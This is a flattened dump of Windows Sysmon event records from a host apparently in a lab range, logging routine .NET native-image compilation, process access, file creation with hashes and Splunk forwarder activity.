21:01:24.498{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A124-60D3-9802-00000000CF01}3936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000019037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:24.435{4DB9351A-A124-60D3-9702-00000000CF01}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1320-0\System.ServiceModel.Internals.dll2021-06-23 21:01:24.435 23542300x800000000000000019036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.076{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F33C943E4A21920C3865EE41C386FC9D,SHA256=6F3C9E36A5277A22A55B9E5A2F8469EB0E3A651C1AE4A9985CCB897728F414FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.029{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A124-60D3-9702-00000000CF01}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:24.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A124-60D3-9702-00000000CF01}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:24.013{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A124-60D3-9702-00000000CF01}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:25.810{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A125-60D3-9D02-00000000CF01}6688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.795{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A125-60D3-9D02-00000000CF01}6688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:01:25.795{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A125-60D3-9D02-00000000CF01}6688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.576{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A125-60D3-9C02-00000000CF01}7052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000019060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.545{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A125-60D3-9C02-00000000CF01}7052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.545{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A125-60D3-9C02-00000000CF01}7052C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x800000000000000019058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.482{4DB9351A-A125-60D3-9B02-00000000CF01}3124NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SYOQN7FWVU\System.ServiceModel.ServiceMoniker40.ni.dll.auxMD5=F7D2DA09880009CEE209A5E6132DC95A,SHA256=1F19BB77CFD7D0BA0365D2A19DB333943FEE1915A932E8E44FA2081D7D7C26BE,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.467{4DB9351A-A125-60D3-9B02-00000000CF01}3124NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SYOQN7FWVU\System.ServiceModel.ServiceMoniker40.ni.dllMD5=9C3B7229DE892683DBBDCDDEB5504A91,SHA256=81DED4C7957EE9B782B68DDCD48344A04ADE00CC8D6FE2EAD1C7F24011139987,IMPHASH=00000000000000000000000000000000truetrue
11241100x800000000000000019056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:25.467{4DB9351A-A125-60D3-9B02-00000000CF01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c34-0\System.ServiceModel.ServiceMoniker40.dll2021-06-23 21:01:25.467
10341000x800000000000000019055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.404{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A125-60D3-9B02-00000000CF01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.389{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A125-60D3-9B02-00000000CF01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.389{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A125-60D3-9B02-00000000CF01}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.326{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A125-60D3-9A02-00000000CF01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.295{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A125-60D3-9A02-00000000CF01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.295{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A125-60D3-9A02-00000000CF01}2192C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x800000000000000019049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.217{4DB9351A-A124-60D3-9902-00000000CF01}6496NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3DXV08NAXP\System.ServiceModel.Routing.ni.dll.auxMD5=5B74D3B5B6CF28167CB5B5DB782F2F04,SHA256=9D27FAF0F2F8B4D262A8F93AA1E4AC1056E97C865650ADB9B03C62D44BAF2D43,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.217{4DB9351A-A124-60D3-9902-00000000CF01}6496NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3DXV08NAXP\System.ServiceModel.Routing.ni.dllMD5=E985EAF11F8A3E299BE07A6432BA5ED9,SHA256=242EAF7F1091B190ADCAABD139305B55874E9EE3A077C9CED6C215D04B0CBD29,IMPHASH=00000000000000000000000000000000truetrue
11241100x800000000000000019047Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:25.185{4DB9351A-A124-60D3-9902-00000000CF01}6496C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1960-0\System.ServiceModel.Routing.dll2021-06-23 21:01:25.185
23542300x800000000000000019046Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:25.108{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B59624244A9A41DD92B9D7CBF088A30,SHA256=408D4821A7BFA504DFAAC61AE147CED7A691174AF3E3911FE200649F2A260D22,IMPHASH=00000000000000000000000000000000falsetrue
354300x800000000000000019045Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:23.254{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61370-false10.0.1.12-8000-
23542300x800000000000000019067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:26.373{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B3564D82C12574DF176791531653150,SHA256=D8F64918D9CB4EB43F33A4539EA0D86E064F3E2B527B96F10A99D0CBE9EBA721,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:26.123{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3362F23C02546713C7A6463466A2900,SHA256=AB85E57E63003ACE25046607D1D28230085427ADD7F40421C4B615D6511F16F3,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:26.092{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=995D70667FAEDD4D62AC8349DFFD80AD,SHA256=4CF96CBEA7A392090C4CFAD4488929835428B273E1632ACC933EAB8C836E478B,IMPHASH=00000000000000000000000000000000falsetrue
10341000x800000000000000019075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.717{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A127-60D3-9F02-00000000CF01}6968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.701{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A127-60D3-9F02-00000000CF01}6968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.701{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A127-60D3-9F02-00000000CF01}6968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
